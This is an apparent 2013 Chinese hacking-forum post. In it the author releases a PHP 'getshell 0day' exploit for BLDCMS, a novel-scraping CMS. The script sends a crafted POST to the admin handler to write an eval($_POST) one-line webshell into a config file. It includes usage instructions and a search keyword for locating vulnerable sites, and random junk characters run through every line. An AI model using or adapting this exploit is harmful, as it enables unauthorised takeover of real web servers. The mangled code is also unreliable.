之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
% J( W8 g, H; |5 K4 I( U
( y; P" I& y. j+ W- n$ Z7 U' F
; M1 o$ \3 I3 I" ^话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 # Z1 }1 y7 K4 \5 n6 v# \5 G! C
% U% M! [- x" P$ b* l$ }, U
既然都有人发了 我就把我之前写好的EXP放出来吧
9 b) E4 W( W3 t) t/ q8 T
, z2 w% L4 R( O- A4 n( T. O7 nview source print?01.php;">1 }# R' Y9 j0 T0 c$ O8 U
02.<!--?php8 u9 ?2 q$ Y; X- \
03.echo "-------------------------------------------------------------------0 U9 F; W# q- T6 I' B$ C
04.
/ K2 j! w+ b. f: p: W# D g% O05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP( T6 l" J$ [' I: u9 W
06. 3 S! U1 K8 x" F0 x( j4 i* B
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
7 `9 H% N& r O# R08.
1 t$ U7 {5 s' p09.QQ:981009941\r\n 2013.3.21\r\n 2 |& z( C" F! j3 y1 ?
10. & v$ o: Q: e* H7 ?
11. 8 O" Q, o8 f7 P1 v; y8 S: u9 l1 I
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
, Q# q- Q/ e2 u13.
0 }. ~& `" B f5 M6 @8 N14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
# q- |( f* E: N/ r15.
i! X5 y. m7 O) k8 H- ]16.--------------------------------------------------------------------\r\n";/ J! p9 { o& I y. t
17.$url=$argv[1];# H2 f1 ]) b* A# F
18.$dir=$argv[2];
( E- n( h' z5 m4 e/ j19.$pass=$argv[3];8 P" t" x3 F' P9 u( y# U) U7 S/ g
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
2 g# C$ X0 ]) N7 Q21.if (emptyempty($pass)||emptyempty($url))5 z& r/ _' ?5 }1 g( K% @' q
22.{exit("请输入参数");}+ A& q! k$ ]6 B; s0 Z1 s7 I# Q6 F
23.else- T( a* w* U, r* {3 ~, @2 {
24.{
6 _6 o2 d/ ^0 x25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
: X4 S$ T( ?) y" b/ ?3 |26. , e5 K4 N. U) l: ^
27.al;: p6 M4 n* r& p4 \( c+ r
28.$length = strlen($fuckdata);* n* F$ Z8 G. g
29.function getshell($url,$pass)6 P* Q* k* V: E0 N# f% Q
30.{
0 O! r! a* }1 m2 C# ?- Q2 A, E31.global $url,$dir,$pass,$eval,$length,$fuckdata;
" z( R0 Z e7 p; z, @32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
3 R$ V9 a s v% \5 i33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";6 t, f$ K( T4 H
34.$header .= "User-Agent: MSIE\r\n";0 a& b: g; K2 F, t- I- Q
35.$header .= "Host:".$url."\r\n";) j$ d( l# p5 ^, _; E
36.$header .= "Content-Length: ".$length."\r\n";
4 U$ ?6 k2 [4 |; O5 a! b1 K" P37.$header .= "Connection: Close\r\n";+ q' F! a7 s# A2 Y' g* E
38.$header .="\r\n";
) v. ~; n9 p# F9 d8 A39.$header .= $fuckdata."\r\n\r\n";! u+ k: l4 k( `$ {! a9 \+ J
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
f. _& `( u4 t$ X4 d% [41.if (!$fp)
. b: j" V" P/ I/ ~1 w! x42.{
: ?8 L6 ~# W0 c0 K43.exit ("利用失败:请检查指定目标是否能正常打开");+ \5 o- W) O8 a" O. P' z# d
44.}
; P! u5 h% F' q8 B. ]2 i45.else{ if (!fputs($fp,$header))5 S/ t: w( I7 l2 D; F3 @
46.{exit ("利用失败");}) N) W: I: x- p, m, ]
47.else
& h1 @3 e+ x' o N1 O48.{
2 l" X. O5 }/ d49.$receive = '';: E/ V4 Z5 m3 S7 k) Y0 w. t0 p
50.while (!feof($fp)) {2 [% g( i ~: Y0 \, F
51.$receive .= @fgets($fp, 1000); T) L3 B' U4 T) c( b
52.}8 | g4 n) L! @3 B1 q, A
53.@fclose($fp);* P( J+ P: I. [: _8 J# ^! D# S! _
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标. d4 x- G# `" z9 M5 e2 `! E
55.
3 D0 @" I) o4 y8 M5 S56.GPC是否=off)";
5 J. _6 k5 k4 S p" S8 l# `4 n57.}}
9 u7 y+ [+ K m& e! x. j58.}, {. v' `% K/ ?
59.}+ U( b! e& t* l" s6 H' s1 h8 t
60.getshell($url,$pass);
# D3 i8 [' F2 N; G61.?-->/ s7 p: O- V1 i& @- A
, N, ]/ k; t! f& K5 e6 p7 Y
- A5 A! a: r4 d6 }! L+ S
9 V/ Y! `+ R* g' K- ^by 数据流) A! l. U( \) @) i
|
发表于 2013-3-26 20:49:10
收藏
支持
反对